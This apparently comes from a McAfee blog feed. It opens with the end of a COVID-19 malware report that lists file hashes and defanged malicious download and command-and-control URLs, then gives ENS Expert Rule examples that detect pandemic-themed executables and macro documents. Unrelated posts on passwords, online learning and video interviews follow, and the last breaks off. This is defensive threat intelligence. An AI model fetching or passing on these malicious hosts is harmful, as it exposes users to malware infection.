SHA256 722a60dfd59a595daa487f2fb759ef6f9ccaabcdf20605d5ae9450cba4a9b9b2
SHA256 1c3532d143212078e204d0f81a782deacd58e8f0e7253472e0509491fd1e5201
SHA256 980de93ad93ecaabc048c9fcc9d62e43eeb32f216c4177963cf1bd94ad53074b
SHA256 a286e3be694b9525530ec6a65b71a8a91e04042c3471e8a9e440f503fe8ce995
SHA256 dbcef5c217a027b8e29b1b750c42a066650820a129543f19364bcb64ac83bc07
SHA256 80f8877406e899c6274331aa991b8d1f4f087e3233c36d39fbaebb729c294899
SHA256 32753598f94412fe3dc382dc12dcf2edf7881d9f07814c82aeec36481b9362b5
SHA256 0fdc97da1c297e6fef93910008fc5c47cbdcd3e2987bc163467b34f56de112ff
SHA256 501cc107e410b245d1b95b64ae0afdae758375b4b3724acfda44041bad963232
SHA256 31cb82cd750af6af9ecf369fd26d47dc913f6b56be6ea12b10fe6dd90ef1b5df
SHA256 da87521ecc146a92a7460a81ebb5ca286450f94c8c9af2a4b3c6c8a180d421c5
SHA256 2bcd35bfb7e4dbdbbf64fce5011199947794425093be7bc74829bfeadb89f0a3
SHA256 90c3d8d13ea151bce21a1f4b842d0ed4eaff09842b23311b2326cf63957fc2b2
SHA256 257afe9f4d7b282b1c0b2f3ebb7e1e80e96c8e0214f1b80ea2b7b636a4e7747d
SHA256 587840d28f2585dd5207731d7fda86a0966c82fa592a26f9148b2de45526db55
SHA256 80ee20c604d5d4b51a30dc21da271651f3c085c40281e3ff3e2ee0175d2ca98d
SHA256 11b4519b76957b0758381f8e19c5e15d8744f7974716642aeb586c615dde38fa
SHA256 6c34cca35d98e464c2f74abd9be670c7f8f707f37cd3f0fd4746c49f8fcf6b07
SHA256 0a8aa3f413a8989bb89599dfc2404f7d34dfbb2e3ce26e900d228e9e8c8908b8
SHA256 c57fa2a5d1a65a687f309f23ca3cfc6721d382b06cf894ee5cd01931bbc17a46
SHA256 9f27a826b4b873c9ea23e023f54d5291a50004d67dd5fe64d1f8c8e8b51b74e3
SHA256 2037c7cc809ed3eddd1338d2bec6266cdb449dbf8ff3510fd360a08d229d4f40
SHA256 8f91d27d3a59c08ab4c453b2679f4620696ba67c56280a4c3757368acb20aad3
SHA256 e8221acccdb8381b5da25a1f61f49dda86b861b52fafe54629396ed1e3346282
SHA256 dc66811ce189240c510733be9e1a2175079dddb80ebf02faaa044fce1f7134d0
SHA256 5b7db5046ba22a6242d5ff6e8f538ad43bba53810117d5eb8f023215aad26e6b
SHA256 f6879431b901df789082452c1c4ffa29e857d247886e421df6dda5fb3d81ca5e
SHA256 4a272dd4a5c6261e983d667dd676875054dd4a4ea11620f16c553fcfd2c44861
SHA256 cc2507ddd53a6f00265f3be51d7217def786914bd1d700ec3c74a2a7107b3476
SHA256 9e4cb963e509fbde6de003a81a3e19cfc703be1c41d20f4b094a0fa89d6ad02c
SHA256 b14d70827d5d668aeb31e94be512fea9fb38ead8ec12cdf7617616801c76b6e9
SHA256 b49c9eba58537f8d856daded80bc9493a83c508d73423b98686d4e8b232d61c3
SHA256 4c9e35f3d5f555dda5f4373cf23fbb289c6067c70841be7022ba6da62e49cccb
SHA256 acec0bb9d9bd199d3e6a77b763cebee8f67275996d3c55af8c617fef76f2e87f
SHA256 7cbcad4d6e9ad8438e5febd3830bff9aef4729b98d23935ad7f9e6d290272732
SHA256 c9c0180eba2a712f1aba1303b90cbf12c1117451ce13b68715931abc437b10cd
SHA256 c322d10ef3aa532d4625f1c2589eae0f723208db37a7c7e81e4f07e36c3a537e
SHA256 3c756d761e89a0ea1216e2b7e57250ac76a80d5fe4f072e3b4b372e609ece74e
SHA256 2a42f500d019a64970e1c63d48eefa27727f80fe0a5b13625e0e72a6ec98b968
SHA256 679a8519587909f655bacea438168cbb4c03434aede9913d9a3a637c55a0eae7
SHA256 e9766b6129d9e1d59b92c4313d704e8cdc1a9b38905021efcac334cdd451e617
SHA256 80392bebe21245128e3353eec7f499bdc5550e67501eceebf21985644d146768
SHA256 215c72df44fe8e564d24f4d9930c27409e7f76e2045c67940cdcecdbdbd3b04f
SHA256 9e12094c15f59d68ad17e5ed42ebb85e5b41f4258823b7b5c7472bdff21e6cee
SHA256 1c98a36229b878bae15985c1ae0ff96e42f36fa06359323f205e18431d780a3b
SHA256 e9621840e1bfaf16eaee37e2d1e9d1f0032158a09e638eaebff6d8626d47c95a
SHA256 c51658ed15a09e9d8759c9fbf24665d6f0101a19a2a147e06d58571d05266d0a
SHA256 5187c9a84f5e69ba4b08538c3f5e7432e7b45ac84dec456ea07325ff5e94319a
SHA256 ddb24e0a38ba9194fe299e351e54facb2cca9e6011db2f5242210284df91f900
SHA256 69724a9bd8033bd16647bc9aea41d5fe9fb7f7a83c5d6fbfb439d21b7b9f53f6
SHA256 d7f15f750cceeb9e28e412f278949f183f98aeb65fe99731b2340c8f1c008465
SHA256 238fa49ed966cb746bffee3e7ca95b4a9db3bb0f897b8fd8ae560f9080749a82
SHA256 69724a9bd8033bd16647bc9aea41d5fe9fb7f7a83c5d6fbfb439d21b7b9f53f6
SHA256 f92fecc6e4656652d66d1e63f29de8bfc09ea6537cf2c4dd01579dc909ba0113
SHA256 5b12f8d817b5f98eb51ef675d5f31d3d1e34bf06befba424f08a5b28ce98d45a
SHA256 3b701eac4e3a73aec109120c97102c17edf88a20d1883dd5eef6db60d52b8d92
SHA256 b49c9eba58537f8d856daded80bc9493a83c508d73423b98686d4e8b232d61c3
SHA256 acec0bb9d9bd199d3e6a77b763cebee8f67275996d3c55af8c617fef76f2e87f
SHA256 4c9e35f3d5f555dda5f4373cf23fbb289c6067c70841be7022ba6da62e49cccb
URL https[:]//onedrive[.]live[.]com/download?cid=265DAF943BE0D06F&resid=265DAF943BE0D06F%21171&authkey=AMI1YV6jNxclaec
URL http[:]//popeorigin[.]pw
URL http[:]//dewakartu[.]info/wp-includes/BRVMFYvIR/
URL http[:]//drhuzaifa[.]com/wp-includes/2i48k7-evv28gw-205510/
URL http[:]//dewarejeki[.]info/wp-includes/up58jauc-pum2w-630352/
URL http[:]//rasmus-plius[.]tomasjs[.]com/wp-admin/KfesPCcG/
URL http[:]//easytogets[.]com/xfxvqq/UxbKAbm/
URL https[:]//cloud-security[.]ggpht[.]ml
URL http[:]//secure[.]zenithglobalplc[.]com/assets/plugins/bootstrap-wizard/system_x64[.]exe
URL http[:]//motivation[.]neighboring[.]site/01/index[.]php
URL https[:]//onedrive[.]live[.]com/download?cid=265DAF943BE0D06F&resid=

265DAF943BE0D06F%21171&authkey=AMI1YV6jNxclaec

URL http[:]//tailuong[.]com[.]vn/[.]xxx/playbook/onelove/fre[.]php
URL https[:]//www[.]onetimeroma[.]com/lost/rockstar[.]php
URL https[:]//www[.]chapeauartgallery[.]com/SUPPORTS/locals[.]php
URL http[:]//www[.]discusshoops[.]com/DISQUS[.]php
URL https[:]//chomyflozy[.]duckdns[.]org
URL http[:]//www[.]slacktracks[.]info/e12/?LJfxZ=hO3hBkxu1F/QQoVtLv3IhDwCcknmtRcJonnhtJ3R0BM0GC3rHSS1kgq0DEskVYHjDJX+/Q==&Vp8h=cz7tTz9p-90h4gt
URL http[:]//www[.]webfeatusa[.]net/e12/?LJfxZ=1CbYOqydIT70m9XPNsNZ3X3NgDEVQnw/rRrz+k+vF8uL+qJ4J3WKysbsjxdZCzgGrC1++w==&Vp8h=cz7tTz9p90h4gt&sql=1
URL http[:]//www[.]makeupprimerspray[.]com/e12/?LJfxZ=NSQopDdawCOOQSyQXUSgSx+w/7t91r6e8z0AUnmVGKAxI+P615MDhQgbvUIoIJuh35rtRQ==&Vp8h=cz7tTz9p90h4gt&sql=1
URL http[:]//mercadosonntag[.]com[.]br/sK2vbV3
URL https[:]//corona-virus-map[.]net/map[.]jar
URL http[:]//corona-virus-map[.]com
URL http[:]//arinnnnnnnn[.]ddns[.]net
URL http[:]//tailuong[.]com[.]vn/[.]xxx/playbook/onelove/fre[.]php
URL http[:]//bralibuda[.]com/4/forum.php
URL http[:]//greferezud[.]com/4/forum[.]php
URL http[:]//deraelous[.]com/4/forum[.]php
URL http[:]//bslines[.]xyz/copy/five/fre[.]php
URL http[:]//dewakartu[.]info/wp-includes/BRVMFYvIR/
URL http[:]//dewarejeki[.]info/wp-includes/up58jauc-pum2w-630352/
URL https[:]//healing-yui223[.]com/cgi-sys/suspendedpage[.]cgi
URL http[:]//109[.]236[.]109[.]159/vnx8v
URL http[:]//www[.]drhuzaifa[.]com/wp-includes/2i48k7-evv28gw-205510/
URL http[:]//85[.]96[.]49[.]152/6oU9ipBIjTSU1
URL https[:]//urbanandruraldesign[.]com[.]au/cdcgov/files/
URL http[:]//198[.]23[.]200[.]241/~power13/.xoiaspxo/fre.php
URL http[:]//helpvan[.]su/
URL http[:]//erasmus-plius[.]tomasjs[.]com/wp-admin/KfesPCcG/
URL https[:]//share[.]dmca[.]gripe/jUuWPW6ONwL1Wkux[.]bin
URL https[:]//gocycle[.]com[.]au/cdcgov/files/
URL https[:]//onthefx[.]com/cd[.]php
URL http[:]//186[.]10[.]98[.]177/faHtH2y
URL http[:]//dewakartu[.]info/wp-includes/BRVMFYvIR/
URL http[:]//drhuzaifa[.]com/wp-includes/2i48k7-evv28gw-205510/
URL http[:]//dewarejeki[.]info/wp-includes/up58jauc-pum2w-630352/
URL http[:]//erasmus-plius[.]tomasjs[.]com/wp-admin/KfesPCcG/
URL http[:]//easytogets[.]com/xfxvqq/UXbKAbm/
URL http[:]//dw[.]adyboh[.]com
URL http[:]//wy[.]adyboh[.]com
URL http[:]//feb[.]kkooppt[.]com
URL http[:]//compdate[.]my03[.]com
URL http[:]//jocoly[.]esvnpe[.]com
URL http[:]//bmy[.]hqoohoa[.]com
URL http[:]//bur[.]vueleslie[.]com
URL http[:]//wind[.]windmilldrops[.]com
URL http[:]//vahlallha[.]duckdns[.]org
URL http[:]//cloud-security[.]ggpht[.]ml
URL http[:]//kbfvzoboss[.]bid

 

Recommendation

This section contains some recommendations which we encourage you to follow. In addition, please also read the following blog also provides some guidance for organizations that have a workforce working remotely and about how McAfee Unified Cloud Edge can help.

Software Updates

As with all our publications, we encourage all our customers to keep their McAfee software up to date. This ensures that you will have the latest signatures and rules to help protect against similar threats to the ones mentioned in this report.

We also recommend installing the latest OS patches, VPN Patches and all other software updates on your machine. In addition we highly recommend utilizing SASE solutions such as McAfee’s Unified Cloud Edge.

Spotting Spam/Phishing emails

The best way to protect yourself is to not open unsolicited emails as malicious files are often distributed via email with the use of attachments or links. To help identify malicious emails, please read this blog: How to Spot Phishing Lures

Global Threat Intelligence (GTI)

McAfee GTI uses heuristics and file reputations checks on suspicious files through on-access scanning and on-demand scanning. This can provide near real time protection. The following KB Article contains the steps for changing the GTI sensitivity level on McAfee products.

You can configure the sensitivity level that McAfee GTI uses when it determines if a detected sample is malware. The McAfee GTI sensitivity level is set to Medium by default. Configure the sensitivity level for each scanner in the On-Access Scan and On-Demand Scan settings.

Sensitivity Level:

  • Very low — High confidence detections. Less aggressive GTI Setting, also least FP prone.
  • Low — This setting is the minimum recommendation for systems with a strong security footprint.
  • Medium — default setting on most products.
  • High — Use this setting for deployment to systems or areas which are regularly infected.
  • Very high — Most aggressive. Detections found with this level are presumed malicious but haven’t been fully tested. McAfee recommends using this level for systems that require highest security but may also result in higher false positive rate.

Endpoint Security (ENS) Product

ENS is our Endpoint Security product and provides a broad range of default protection, self-help protection and detection abilities.

Expert Rules

Expert Rules are text-based custom rules that can be created in the Exploit Prevention policy in ENS Threat Prevention 10.5.3 and above.

Expert Rules provide additional parameters and allow much more flexibility than the custom rules that can be created in the Access Protection policy. It also allows system administration to control / monitor an endpoint system at a very granular level. This is a very useful toolkit for administrators and SOC’s and allow quick creation and deployment of powerful extensions to detect and protect ability. You can author monitoring and blocking for processes, files, memory injection, module load and unload events, etc.

We recommend reading the following blog which describes how to use Expert Rules and gives some good examples which would help block potentially malicious activity.

 

Here are some examples of quick expert rules you can formulate to utilize at your endpoint against Covid-19 related threats

Example Rule – 1

The following rule helps block archived corona named executables accessed from inside archived email attachments

Rule {

Process {

Include OBJECT_NAME { -v “**” }

}

Target {

Match PROCESS {

Include OBJECT_NAME { -v “**\\appdata\\Local\\temp\\Rar*\\*corona*.exe” }

Include OBJECT_NAME { -v “**\\appdata\\Local\\temp\\Rar*\\*covid*.exe” }

Include -access “CREATE”

}

}

}

 

Example Rule – 2

The following rule helps block COVID named document containing macros accessed from email attachments or downloaded locations

Rule {

Process {

Include OBJECT_NAME { -v “**\\winword.exe” }

Include PROCESS_CMD_LINE { -v “**corona**” }

Include PROCESS_CMD_LINE { -v “**covid**” }

}

Target {

Match SECTION {

Include OBJECT_NAME { -v “**\\vbe7.dll” }

Include OBJECT_NAME { -v “**\\vbe7intl.dll” }

}

}

}

 

Example Rule – 3

The following Expert rule prevents certain version of Foobar Communication software from executing.

Rule {

Process {

Include OBJECT_NAME { -v “**” }

}

Target {

Match PROCESS {

Include DESCRIPTION { -v “FooBar Communications ” }

Include VERSION { -v “4,5,**” }

Include -access “CREATE”

 

}

}

}

 

Expert rules are flexible that the SOC analyst / author can test the rules in report only mode and then check for potential falses in the environment. Finally, they can be turned on to block mode.

JTI Rules

JTI Rules are released fortnightly and they target suspicious process chains and command-line threats. They also additionally detect suspicious files based on locations / characteristics. From the collection of JTI rules, we recommend turning on the few of Evaluate or HighOn rules for advanced threat protection. These rules can be turned default on from the EPO console.

  • Protection from suspicious Command line parameters where malware invokes PowerShell with command-line parameters for malicious activities. This rule is identifiable in the EPO console with the rule id 262.
    • Rule:262 – Identify suspicious command parameter execution for Security rule group assignments
  • Protection from malware launching suspicious command-line based script applications like WScript, CScript, and PowerShell. This rule is identifiable in the EPO console with the rule id 320.
    • Rule:320 – Prevent cmd.exe from launching other script interpreters such as CScript or PowerShell by default only in Security rule group assignments
  • Protection from files being executed from non-standard locations like \windows\fonts or \windows\resources location. This rule also protects spawning of wmiprvse.exe from suspicious process’s like foobar.exe, etc. This rule is identifiable in the EPO console with the rule id 238
    • Rule 238 – Identify abuse of common process’s spawned from non-standard locations

Fortnightly released JTI rules are normally released in Evaluate or HighOn setting. We recommend EPO admins to go through the release notes of the product and enable rules that suits their environment.

Enable AMSI

AMSI by default is set to observe mode. We recommend changing this to block mode as it will detect a vast majority of threats which are often email based such a JavaScript downloaders.

Please read this blog to find out more about AMSI and which threats it helps detect.

Suspicious Email attachment detection

As shown in this report, Email remains a top vector for attackers.  McAfee endpoint products use a combination of product features and content for increased agility.  In McAfee Endpoint Security (ENS) 10.5 and above, such protection is enabled via the ‘Detect suspicious email attachments’ option and maintained through DAT content.  This capability goes beyond the level of protection offered by email clients by not only blocking applications and scripts, but also a variety of threat types in their native form, as well as those compressed and contained within archives and other formats.

For a guide on how to enable this please read this blog: McAfee Protects Against Suspicious Email Attachements

ATP (Adaptive Threat Protection)

McAfee ATP (Adaptive Threat Protection) utilizes Machine Learning via our Real Protect Module. This provides pre and post execution monitoring of threats using ML models that are deployed locally and in the cloud. In addition, ATP provides and additional layer of protection with advanced rules for threat evaluation based on static and behavioral features.

We recommend enabling Real Protect at the default settings at the minimum. ATP rules come in three forms: Evaluate, DefaultOn and HighOn.

  • Evaluate rules are tested in the field by McAfee to determine if they are robust enough to detect malicious activity. They do not block by default but log activity in the ATP log. Such rules can be enabled by administrators via EPO to Block. McAfee researchers on a regular basis analyze performance of such rules and make modifications to promote them to DefaultOn (Rule Assignment to Balanced (default)) or HighOn (Rule Assignment to Security). Prior to manual enablement for Block mode, it is recommended that you observe triggers via the ATP logs to ensure they suite your environment.
  • DefaultOn rules are high confidence rules that block by default within ENS ATP and MVISION Endpoint. They can be turned off if required by administrators from within EPO.
  • HighOn rules detect behavior that is known to be malicious but may have some overlap with non-malicious applications. These rules work as Evaluate in balanced posture but act as DefaultOn in Security posture. Administrators are encouraged to utilize this setting to during high malware activity events for monitoring and default blocking.

For details on Rule descriptions, security posture and settings please refer this KB Article: https://kc.mcafee.com/corporate/index?page=content&id=KB82925

Unified Cloud Edge

Get a SASE (Secure Access Service Edge) architected web protection solution like McAfee’s Unified Cloud Edge. This delivers anytime/anywhere protection (like WFH scenarios) for web traffic, cloud-native and cloud-to-cloud traffic – whether you’re on a VPN, or directly connected to the internet. As an example, even if you access a link from a malicious email or visit a hostile site in a non-VPN setting, you will continue to benefit from our GTI and cloud-based threat to protect against malicious sites and downloads. Unified Cloud Edge can expand your capabilities for URL protection by providing the following:

  1. Malicious URL – blocked via GTI and URL
  2. Block any download from a benign URL (example: onedrive.live.com) – possible to block via tenant restrictions. For example: corporate Onedrive permitted, personal (live.com) or other companies blocked.
  3. Malicious download – blocked by the cloud gateway file engines, including AV, GAM, and GTI.
  4. 3rd party Malicious upload (placing a payload in an open share on the company Onedrive) – blocked via API-based scanning of the corporate sanctioned services, same AV/GAM/GTI layers of inspection.

MVISION Unified Cloud Edge protects data from device to cloud and prevents cloud-native threats that are invisible to the corporate network. This creates a secure environment for the adoption of cloud services, enabling cloud access from any device and allowing ultimate workforce productivity.

Conclusion

As you can see from this report, there are various threats which are taking advantage of this pandemic. We will continue to enable our customers to use our recommendations to remain safe during this challenging time. Be extra vigilant online and stay safe and healthy always!

As we continually provide recommendations based on current data, we encourage regular reading of McAfee blogs where you will find regular updates on threat patterns and protection information.

The post COVID-19 – Malware Makes Hay During a Pandemic appeared first on McAfee Blogs.

World Password Day 2020

Are Your Password Habits Keeping You Safe Online?

Learning how to navigate our entire lives online has definitely been a steep learning curve for many of us over the last few weeks. Whether it’s working from home, helping our kids learn from home, conducting ‘wine time’ from home or even doing our Zumba classes from home – it’s essential now more than ever that we are doing this safely. And one of the most powerful yet simple ways we can ‘sure-up’ our online safety is by being smart with our passwords.

World Password Day – Take A Minute To Check Your Approach

Today is World Password Day – the perfect opportunity to ensure we are doing all we can to manage our online logins. It’s quite unsettling to think that one of the easiest ways for cybercriminals to get their hands on the sensitive information we store in our online accounts is through our passwords.

Passwords act like a key to our digital identity. Not only do they allow us to bank, shop, work, learn, date and socialise online but they also protect us as well. Strong, complex passwords ensure all the information we store online (aka our digital assets) are protected which is essential for our privacy and financial and personal security.

So, let’s use this annual event to make sure we are doing all we can to lock down our precious online data by managing our passwords properly.

Same Password For Every Account? – Rookie Error

If I had to count up all my online accounts on my fingers and toes, I would quickly run out of body parts! With so many logins to remember, many of us end of using the same password for every account. And while that might seem so practical it, in fact, makes us very vulnerable. Just think about this scenario: if you become the victim of an online scam and the password to one of your online accounts is stolen, then a cybercriminal can then use this same password to access all your online accounts.

So, before you know it, a cybercriminal can access your emails, bank accounts, online shopping accounts – that may have stored credit cards, private photo and video files.

What You Can Do TODAY to Ensure your Password Habits are Keeping you Safe

Yes, we are all human which means we are going to take shortcuts. I get it! I love shortcuts – I’m a fan of using pasta sauce from the jar! But if there’s one area where shortcuts should NOT be used it’s with passwords. So, here are my top suggestions on how you can stop your private online data falling into the wrong hands and block cybercriminals at the very first point of entry.

  1. Commit to NOT Using Common Passwords

If your password is ‘123456’ then you need to change it now. The UK’s National Cyber Safety Centre showed in a survey last year that this is the most commonly used password. In fact, in the eight years since I’ve been doing this job, this password has annually topped surveys.

Passwords are the gateway to our digital lives. To avoid giving the wrong people access to your accounts, make sure you create strong and unique passwords. This means including numbers, lowercase and uppercase letters and symbols. The more complex your password, the more difficult it is to crack. Why not create a nonsensical phrase or sentence? And always avoid using simple personal details within your password altogether. Your date of birth, middle name or pet names are things cybercriminals can trace through your social media accounts.

  1. Same Password For Every Account? Think Again

The idea of having one password across all online accounts is alluring because let’s admit it…we’ve all been locked out of an account after failing to remember the password! While having one password to remember for all accounts seems to make life easier, it increases the risk of your vital online data being compromised at once across different accounts. So, ensure that your logins are unique for every account to avoid having all your accounts becoming vulnerable in case you are hacked.

  1. ALWAYS Select Multi-Factor Authentication

Wherever possible, embrace multifactor authentication (MFA) for online accounts. MFA is a security system that requires more than one way of identification before gaining access to an account. Most commonly, it involves a security code sent to your smartphone, security questions or even a fingerprint, on top of the password. An extra layer of defence to stop sham access to vital online data? Yes please!

  1. Give Your Passwords a Health Check

What better way to check the health of your passwords than to see whether they’ve been compromised in a data breach. The website www.haveibeenpwned.com.au is an effective way to check whether a cybercriminal has discovered your passwords. If yes, give your passwords an overhaul and change them wherever they are used to safeguard your data.

  1. Employ A Password Manager

If you are currently feeling a tad overwhelmed at the thought of creating and managing unique passwords for your multiple online accounts, do not stress – I have a solution – a password manager. This marvellous software program will create random and complex passwords for each of your accounts and store them securely which means you don’t need to! All you need to do is remember the master password!! When choosing a password manager, ensure it uses multi-factor authentication to identify you eg facial recognition, fingerprint and a password.

If you have a spare 30 minutes today then please take the time to give your password habits an overhaul. I know we are all so flat out juggling work and kids at the moment but a careless approach to password security is no different to a careless approach to home security. So, get your passwords working for you so you can continue living your life online – especially Friday night ‘virtual drinks’!!

 

 

The post World Password Day 2020 appeared first on McAfee Blogs.

Personal and Professional Development From Home

Personal and Professional Development from Home

Like so many of us, I’m doing my best to look forward. While everyone’s situation is different from family to family, community to community, and even from country to country, one thing I hope is that you have the chance to look forward too—like what you want your life to look like once we’ve moved past the days we’re in right now.

That’s what inspired this article. I wanted to share some online resources that can help you take this time to do something for yourself and pursue some degree of personal or professional development if you can. After all, if we can work it in, now’s the time for a little self-improvement.

For me, I’m diving into subject matter that largely takes me outside of technology and my daily work. One of my favorites right now is gardening. I’m taking a Master Class on gardening from Ron Finley, a man who started planting vegetables in the dirt parking strip outside his home in South Central Los Angeles. At first, Ron was cited for gardening without a permit. After that, he got the local laws changed so that public planting could not only continue but also thrive. In short order, his urban gardening readily turned into a movement based on the idea that everyone in every community can grow their own healthy food.

The class is absolutely inspiring, as is seeing Ron do things like turn an old dresser drawer into a garden. He has plenty of tricks like that he can show you. And I can tell you this—I certainly look at my garden (and what I’m eating!) through new eyes now thanks to him.

Along those lines, I’ve put together a few resources for those of you who want to pursue something that’s always interested you or something new altogether. Once you start researching all the personal and professional development options available, you’ll see plenty of opportunities—and ways to look at your world through new eyes too.

Free Classes from Open Culture

First off, Open Culture is an amazing resource overall. It got its start about 14 years ago with the mission of scouring the web for high-quality educational and cultural resources, all of them free. Today, it’s a massive curation effort packed with hundreds, and even thousands, of movies, lectures, eBooks, videos, university courses, audio books, and so much more across numerous collections. Again, all free.

For example, the page dedicated to 1,500 Free Online Courses from Top Universities is everything you’d expect it to be. And then some. The categories range from Art & Art History to Writing & Journalism, with Business, Economics, Literature, Psychology, and more in between. If picking up a new language or dusting off an old one that’s been on the shelf since your high school days is on your mind, they also have links to learn 48 different languages. In addition, Open Culture keeps a growing list of dozens of free textbooks as well.

University-Led Learning

Numerous higher learning institutions have offered free coursework online for some time now. They’re an outstanding resource for personal enrichment, with lectures, projects, and materials often drawn straight from campus classrooms. For example:

Open Yale Courses

Open Yale Courses offers “a full set of class lectures produced in high-quality video accompanied by such other course materials as syllabi, suggested readings, and problem sets.” Classes range from history and econ to literature and psychology.

Stanford University

Stanford University offers free courses as well and on an interesting blend of topics. If you’re interested in “Child Nutrition and Cooking” or an “Introduction to the Internet of Things,” Stanford’s free course catalog is a great place to start.

Open Learn

Open Learn courses are part of a platform created by the UK’s The Open University as part of its Royal Charter commitment to support the wellbeing of the community. Here you’ll find thousands of resources spread across eight broad categories.

edX

edX has more than 2,800 online courses from roughly 140 institutions across the globe—including MIT, Harvard, UC Berkeley, Boston University, the University of Edinburgh, the University of Tokyo, and Oxford to name a few. Many classes are free, and some offer a formal certificate of completion for a fee.

Mixes of Free and Paid Learning

Udemy

Udemy has 100,000 online courses. While the emphasis is on paid content, simply filter your search for “free” items and you’ll find numerous options there.

Coursera

Coursera provides free courses from university and industry partners with access to on-demand video lectures, homework exercises, and community discussion forums. Degrees and certificates are available through their paid options as well.

iTunes U

iTunes U provides yet another learning opportunity for iPhone, iPad, and iPod Touch users. While the app is designed to help teachers create lesson plans and collaborate with students, it’s also great for the rest of us too., It offers free access to a large collection of free educational content in “public courses from leading schools, universities, museums, and cultural institutions.”

Codecademy

Codecademy focuses on web development, programming and computer science, and data science. It has a free option for a limited number of classes, plus a paid monthly membership offers more content and guidance. As of this writing, a free trial membership is available.

Big ideas for small business

Maybe you’re taking this opportunity to launch a little side business or you’re looking to brush up on some business skills in general. If so, you can visit the U.S. Small Business Administration Learning Center, which is packed with great content that covers broad business topics. Although some of the content is specific to the U.S., plenty of it can benefit all—such as articles on business planning, social media marketing, and other programs for mastering daily operations.

Learn Safely Online

As always, give your security a good look as you embark on any classwork online. My recent article, “How to Stay Secure While Distance Learning” offers some great advice for university students, yet it certainly applies to the rest of us too as we learn online. Also, consider using protection that keeps you safer while doing your reading and researching online. That’ll help you go about your studies without worrying about sketchy links, misclicks, typos, or bad downloads that could land you on a malicious site or drop adware, spyware, or viruses on your device.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Personal and Professional Development From Home appeared first on McAfee Blogs.

How to Ace Your Video Interview: Job Hunting From Home

How to Ace Your Video Interview: Job Hunting from Home, Part Two  

So, it’s game day. Your online video interview is about to begin, and you’re feeling good. Okay, so maybe there are just a few nerves, but you know you’ve got this. The space you’ve set up for your call is all in order and your technology is ready to go. You’ve prepped for this moment and it shows.

In my last article, we covered the pre-game day basics to get your location and technology ready for an online interview. Here, we’ll talk about the interview itself. Once again, I caught up with Shawn Hutcherson, our Lead Talent Acquisition Partner here at McAfee, for his insight and experience as a person who’s conducted numerous interviews online.

And here’s the good news: while a video interview may be new to you, plenty of what happens in a good face-to-face interview happens in a good video interview too. We’ll cover exactly that, along with a number of pointers that are specific to video interviews—so you can absolutely ace yours.

Prior to the Interview:

As always, the foundation of a good interview is built upon how you prepare. So much of what you’ll see here should look comfortingly familiar. There are a few new wrinkles to consider with a video interview, just as you’d expect, so here’s a quick rundown of things you can do in the days, and moments, leading up to your call:

Check up on company news.

Did the company have a recent product release, a change in management, or make any other noteworthy moves? You’ll want to know about any such news as it may reshape your understanding of the company and help form some good questions to ask. In either case, it’s a chance to show an interviewer that you’ve done your homework.

Look up your interviewer(s) on LinkedIn.

Aside with providing you some background, it’s also a way to spot common interests that make for easy icebreakers. Likewise, a little familiarity can make for a smoother conversation in the long run if you spot other things like shared experiences and mutual acquaintances.

Grab a pad of paper and fill it up with a few questions.

Having questions prepared shows interest on your part, and you can also jot down any items of interest that came up in your research. Be ready to have this at your side during your interview. Keeping it all together in a nice folio or binder will look extra-sharp too.

“Don’t change anything on game day.”

More plainly, keep to your regular everyday routine. If you drink two cups of coffee in the morning, stick with two. No need to “amp up” with that extra cup. You know your daily rhythm and what keeps you feeling good, so stick with it. Also, it’s a good idea to keep a bottle of water handy. You’ll be chatting for a while, so keep hydrated.

Clear your computer desktop.

Another thing to keep in mind is to close unnecessary apps, browser windows, or anything else that could create a distraction of any kind. For example, any apps that might pop up an alert or notification on your computer desktop, like an email or chat app, should be closed. Likewise, close browser windows so that you don’t share any of them by accident—such as your social media feed, any sensitive information, and so forth.

Check your space.

Look around the room for other things that could interrupt the call in any way. Put your phone on silent (and make sure it’s charged if you need to quickly switch the interview over to a phone call instead). Turn off any loud fans or other appliances that could create background noise. Also check in with your family or roommates one last time and let them know that you’re heading into your interview and when you expect to be done.

Have a backup plan.

So, let’s say the internet connection is sort of lousy or the two of you experience some sort of technical glitch. Have phone numbers handy—and perhaps a draft email ready to go for such situations. Last-minute emails written hastily in the wake of a dropped session can be prone to typos. A professionally written email will go a long way.

A Quick Word on How to Dress for a Video Interview

Granted, working from home may have us dressing far more informally than we ever would in the office, even on the most casual of “Casual Fridays,” so this is a good opportunity to revisit the notion of how to dress for a video interview. The answer is much the same as any other interview as you’ve had before: dress one step above where you think people would normally dress at that employer. For example, at McAfee, we have a pretty relaxed culture, so a smart “business casual” look for an interview works great for us. If the employer is more formal, proper business attire is the way to go. And if you have a favorite shirt, dress, or earrings wear them. Overall, the best advice is, “Look good, feel good, play good.” When you’re dressed comfortably and for the occasion, a great conversation can come rather naturally.

During the Interview

An old interview axiom is to show up early. The same applies here. Click on that link your interviewer provided a good 10 to 15 minutes early and put yourself on mute. This way, you can address any glitches with plenty of time to spare—like, “Oh, this link isn’t actually working. I’d better shoot off an email or text to get that straightened out.”

So let’s say you connect without a hitch. The camera’s on and your live, here are a few things to keep in mind:

Build a rapport.

In virtual situations, it’s easy to feel like you have to get right down to business. Actually, this is your chance to settle in. It’s absolutely okay to ask, “How are you doing today?” or chat about your families or how you’ve been spending your time for a bit. Think back to that LinkedIn search you did. You may have mutual friends or interests. Bring them up.

Feel free to share.

If you’re doing this at home, there’s absolutely no need to apologize for that. Lean into it with something like, “Glad to be here! And hey, just so you know, I have a parakeet and a shih tzu, so there may be a little noise in the background.” And who knows, you’re interviewer may have a parakeet and a shih tzu too—or some other pets or family in the background. So really, this is another opportunity to connect.

Keep up that eye contact.

This is another tricky mannerism to master in a virtual situation but try to imagine as if the interviewer is in the room with you. That could be a coffee house or a comfortable conference room. Keep your attention on the person and face the screen so that you maintain eye contact. After all, no one wants to see you turn your head and talk to your earlobe.

Remember those non-verbal cues.

Related to the above, a great deal of our communication comes across non-verbally. Smile when you speak if it feels right and nod as you listen. Posture, just like in a face-to-face interview, is important too. Sit straight, yet comfortably, and feel free to lean in and back again with the natural flow of conversation.

Give yourselves some space.

Another pitfall of virtual conversations are long monologues. Ever been on a lousy conference call where someone fails to pause and let others talk? Or how about when people step on each other’s sentences? You can avoid faux pas like those by interjecting simple open-ended questions into the conversation. Doing so will give your interviewer a chance to show they understand what you’ve conveyed. Also, their answer can lead you into the next topic.

Ask questions in return.

